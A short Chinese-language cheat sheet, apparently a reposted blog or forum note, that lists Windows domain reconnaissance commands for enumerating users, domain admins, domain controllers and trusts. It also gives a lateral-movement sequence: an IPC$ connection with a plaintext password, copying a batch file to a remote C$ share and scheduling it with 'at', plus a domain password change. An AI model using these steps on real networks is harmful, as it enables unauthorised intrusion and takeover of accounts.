很多人都整理过这个,于是
ipconfig /all #查询本机 IP 段,所在域等
net user //本机用户列表
net localgroup administrators //查看本机管理员域管
net session // 查看当前会话
net use \ipipc$ password /user:username // 建立域内 IPC 会话
net share //查看 SMB 指向的路径
net view //查询同一域内机器列表
net view /domain //查询域列表
net start // 查看当前运行的服务
whoami //查询账号所属权限
whoami/all //查看 sid 值
net accounts // 查看本地密码策略
net accounts /domain // 查看域密码策略
netstat –an //网络连接查询
route print //路由打印
nltest /dsgetdc:域名 //查询域控主机名。 如 nltest /dclist:same
nltest /domain_trusts //可以列出域之间的信任关系
net view /domain:same //查看 same 域中计算机列表
net time /domain //判断主域,主域服务器都做时间服务器
net config workstation // 当前登录域
net group "enterprise admins" /domain 企业管理组
net user /domain lcx@same.com mima //修改域用户密码,需要域管理员权限
net user /domain // 查询域用户
net group /domain // 查询域里面的工作组
net group "domain admins" /domain // 查询域管理员用户组
net localgroup administrators /domain //登录本机的域管理员
net group "domain controllers" /domain // 查看域控制器(如果有多台)
net use \192.168.25.203 Passw0rd! /user:admin //建立 ipc 连接
copy lcx.bat \192.168.25.203c$adduser //复制 lcx.bat 到目标 C 盘 adduser 目录,bat干啥都行
net time \192.168.25.203 //查看目标当前时间,得到当前时间
at \192.168.25.203 12:00 c:adduserlcx.bat //告诉目标在12点的时候运行bat
at \192.168.25.203 //查看目标的计划任务列表
tasklist /V //查看进程,显示对应用户
tasklist /S ip /U domainusername /P /V //查看远程计算机进程列表
qprocess * //类似tasklist
qprocess /SERVER:IP //远程查看计算机进程列表
nslookup –qt-MX Yahoo.com //查看邮件服务器
set //查看系统环境变量
systeminfo //查看系统信息
qwinsta //查看登录情况
qwinsta /SERVER:IP //查看远程登录情况
fsutil fsinfo drives // 查看所有盘符
gpupdate /force //更新域策略
域控中命令:
dsquery computer domainroot -limit 65535 && net group "domain computers" /domain //列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain //列出该域内所有用户名
dsquery subnet //列出该域内网段划分
dsquery group && net group /domain //列出该域内分组
dsquery ou //列出该域内组织单位
dsquery server && net time /domain //列出该域内域控制器
随便转载,请标明作者出处